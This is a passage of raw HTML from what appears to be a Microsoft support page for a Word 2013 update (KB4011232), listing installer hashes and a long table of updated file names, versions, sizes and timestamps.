2</th></tr><tr><td>word2013-kb4011232-fullfile-x64-glb.exe</td><td>606CDBCCD3848F6CEC7C87D9B46A0E34E7638341</td><td>1E8503F5A2F5B29F75FE383081982D7F49378E703E6BB614E24D9C22F60FCD67</td></tr><tr><td>word2013-kb4011232-fullfile-x86-glb.exe</td><td>C4FD7F0E32F5F282EB1D0F8363697649F31D2329</td><td>4A065EA6D0BCE940773A9920C34EF7C108E8B377BCE77D82A0A1E386E39F887A</td></tr></tbody></table><h3>File information</h3><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">For all supported x86-based versions of Word 2013</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p>\u00a0</p><table class=\"table\"><tbody><tr><th>File identifier</th><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th></tr><tr><td>calligra.dll</td><td>calligra.dll</td><td>15.0.4545.1000</td><td>279752</td><td>4-Oct-17</td><td>11:00</td></tr><tr><td>bibform.xml_1025</td><td>bibform.xml</td><td>\u00a0</td><td>106100</td><td>4-Oct-17</td><td>10:58</td></tr><tr><td>wwintl.dll_1025</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>947384</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.dll_1026</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>997560</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>bibform.xml_1029</td><td>bibform.xml</td><td>\u00a0</td><td>112512</td><td>4-Oct-17</td><td>10:58</td></tr><tr><td>wwintl.dll_1029</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>1065656</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.dll_1030</td><td>wwintl.dll</td><td>15.0.4937.1000</td><td>905912</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>bibform.xml_1031</td><td>bibform.xml</td><td>\u00a0</td><td>114240</td><td>4-Oct-17</td><td>10:58</td></tr><tr><td>wwintl.dll_1031</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>993976</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>bibform.xml_1032</td><td>bibform.xml</td><td>\u00a0</td><td>114340</td><td>4-Oct-17</td><td>10:58</td></tr><tr><td>wwintl.dll_1032</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>1132216</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>bibform.xml_3082</td><td>bibform.xml</td><td>\u00a0</td><td>114930</td><td>4-Oct-17</td><td>10:58</td></tr><tr><td>wwintl.dll_3082</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>941240</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.dll_1061</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>922296</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.dll_1035</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>925368</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>bibform.xml_1036</td><td>bibform.xml</td><td>\u00a0</td><td>114844</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>wwintl.dll_1036</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>1049784</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>bibform.xml_1037</td><td>bibform.xml</td><td>\u00a0</td><td>106424</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>wwintl.dll_1037</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>937656</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll_1081</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>966840</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll_1050</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>947384</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>bibform.xml_1038</td><td>bibform.xml</td><td>\u00a0</td><td>112560</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>wwintl.dll_1038</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>1086136</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll_1057</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>867000</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>bibform.xml_1040</td><td>bibform.xml</td><td>\u00a0</td><td>112426</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>wwintl.dll_1040</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>947896</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>bibform.xml_1041</td><td>bibform.xml</td><td>\u00a0</td><td>97202</td><td>4-Oct-17</td><td>10:58</td></tr><tr><td>wwintl.dll_1041</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>1004728</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.dll_1087</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>1025208</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>bibform.xml_1042</td><td>bibform.xml</td><td>\u00a0</td><td>97630</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>wwintl.dll_1042</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>1004216</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll_1063</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>1006264</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>bibform.xml_1062</td><td>bibform.xml</td><td>\u00a0</td><td>114514</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>wwintl.dll_1062</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>982200</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll_1086</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>870584</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll_1044</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>914616</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>bibform.xml_1043</td><td>bibform.xml</td><td>\u00a0</td><td>113208</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>wwintl.dll_1043</td><td>wwintl.dll</td><td>15.0.4945.1000</td><td>932536</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll_1045</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>1044152</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>bibform.xml_1046</td><td>bibform.xml</td><td>\u00a0</td><td>111828</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>wwintl.dll_1046</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>949944</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll_2070</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>963256</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll_1048</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>1085112</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>bibform.xml_1049</td><td>bibform.xml</td><td>\u00a0</td><td>112712</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>wwintl.dll_1049</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>970424</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>bibform.xml_1051</td><td>bibform.xml</td><td>\u00a0</td><td>111034</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>wwintl.dll_1051</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>1083576</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll_1060</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>970936</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll_2074</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>1003192</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll_1053</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>913080</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll_1054</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>933048</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll_1055</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>1041080</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll_1058</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>977080</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>bibform.xml_1066</td><td>bibform.xml</td><td>\u00a0</td><td>113620</td><td>4-Oct-17</td><td>11:00</td></tr><tr><td>wwintl.dll_1066</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>1072824</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>bibform.xml_2052</td><td>bibform.xml</td><td>\u00a0</td><td>96830</td><td>4-Oct-17</td><td>11:00</td></tr><tr><td>wwintl.dll_2052</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>823480</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>bibform.xml_1028</td><td>bibform.xml</td><td>\u00a0</td><td>96804</td><td>4-Oct-17</td><td>11:00</td></tr><tr><td>wwintl.dll_1028</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>837304</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>document_parts.dot_1025</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3633666</td><td>4-Oct-17</td><td>10:58</td></tr><tr><td>document_parts.dot_1026</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3637449</td><td>4-Oct-17</td><td>10:58</td></tr><tr><td>document_parts.dot_1029</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3618985</td><td>4-Oct-17</td><td>10:58</td></tr><tr><td>document_parts.dot_1030</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3608062</td><td>4-Oct-17</td><td>10:58</td></tr><tr><td>document_parts.dot_1031</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3603386</td><td>4-Oct-17</td><td>10:58</td></tr><tr><td>document_parts.dot_1032</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3653167</td><td>4-Oct-17</td><td>10:58</td></tr><tr><td>document_parts.dot_3082</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3612006</td><td>4-Oct-17</td><td>10:58</td></tr><tr><td>document_parts.dot_1061</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3604130</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1035</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3603428</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1036</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3619560</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1037</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3629591</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1081</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3644334</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1050</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3607442</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1038</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3604785</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1057</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3609041</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1040</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3599032</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1041</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3636899</td><td>4-Oct-17</td><td>10:58</td></tr><tr><td>document_parts.dot_1087</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3634700</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1042</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3628333</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1063</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3622044</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1062</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3611384</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1086</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3604931</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1044</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3608018</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1043</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3601853</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1045</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3609394</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1046</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3617732</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_2070</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3613701</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1048</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3617400</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1049</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3646588</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1051</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3613567</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1060</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3604721</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_2074</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3617809</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1053</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3609521</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1054</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3653990</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1055</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3607036</td><td>4-Oct-17</td><td>10:59</td></tr><tr><td>document_parts.dot_1058</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3649803</td><td>4-Oct-17</td><td>11:00</td></tr><tr><td>document_parts.dot_1066</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3631479</td><td>4-Oct-17</td><td>11:00</td></tr><tr><td>document_parts.dot_2052</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3615970</td><td>4-Oct-17</td><td>11:00</td></tr><tr><td>document_parts.dot_1028</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3627311</td><td>4-Oct-17</td><td>11:00</td></tr><tr><td>wordicon.exe</td><td>wordicon.exe</td><td>15.0.4553.1000</td><td>3015336</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>pdfreflow.exe</td><td>pdfreflow.exe</td><td>15.0.4971.1000</td><td>9611992</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>wwintl.dll.idx_dll_1025</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.rest.idx_dll_1025</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>526016</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.dll.idx_dll_1026</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.rest.idx_dll_1026</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>533696</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.dll.idx_dll_1029</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.rest.idx_dll_1029</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>630976</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.dll.idx_dll_1030</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114368</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.rest.idx_dll_1030</td><td>wwintl.rest.idx_dll</td><td>15.0.4937.1000</td><td>620736</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.dll.idx_dll_1031</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115904</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.rest.idx_dll_1031</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>624832</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.dll.idx_dll_1032</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115904</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.rest.idx_dll_1032</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>528064</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.dll.idx_dll_1033</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117504</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>wwintl.rest.idx_dll_1033</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1501</td><td>628424</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>wwintl.dll.idx_dll_3082</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115392</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.rest.idx_dll_3082</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>630464</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.dll.idx_dll_1061</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.rest.idx_dll_1061</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>528064</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.dll.idx_dll_1035</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.rest.idx_dll_1035</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>621224</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.dll.idx_dll_1036</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115392</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.rest.idx_dll_1036</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>628416</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.dll.idx_dll_1037</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1037</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>520360</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1081</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115904</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1081</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>524480</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1050</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>118976</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1050</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>625832</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1038</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116416</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1038</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>623808</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1057</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1057</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>531136</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1040</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114880</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1040</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>620712</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1041</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115400</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.rest.idx_dll_1041</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>496296</td><td>4-Oct-17</td><td>10:36</td></tr><tr><td>wwintl.dll.idx_dll_1087</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>113344</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1087</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>525504</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1042</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>113344</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1042</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>511680</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1063</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1063</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>522408</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1062</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>118976</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1062</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>532672</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1086</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1086</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>530112</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1044</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114880</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1044</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>614056</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1043</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114880</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1043</td><td>wwintl.rest.idx_dll</td><td>15.0.4945.1000</td><td>625856</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1045</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117952</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1045</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>528064</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1046</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>118464</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1046</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>637120</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_2070</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>118464</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_2070</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>637632</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1048</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1048</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>618664</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1049</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115904</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1049</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>514728</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1051</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1051</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>631488</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1060</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1060</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>612520</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_2074</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117952</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_2074</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>522408</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1053</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114368</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1053</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>621760</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1054</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114880</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1054</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>519872</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1055</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117952</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1055</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>625320</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1058</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1058</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>533184</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1066</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117960</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1066</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>527528</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_2052</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116416</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_2052</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>517312</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.dll.idx_dll_1028</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114368</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>wwintl.rest.idx_dll_1028</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>516800</td><td>4-Oct-17</td><td>10:37</td></tr><tr><td>winword.veman.xml</td><td>winword.visualelementsmanifest.xml</td><td>\u00a0</td><td>342</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>winword.veman.xml</td><td>winwordd.visualelementsmanifest.xml</td><td>\u00a0</td><td>342</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>bibform.xml_1033</td><td>bibform.xml</td><td>\u00a0</td><td>111310</td><td>4-Oct-17</td><td>03:05</td></tr><tr><td>wwintl.dll_1033</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>794808</td><td>4-Oct-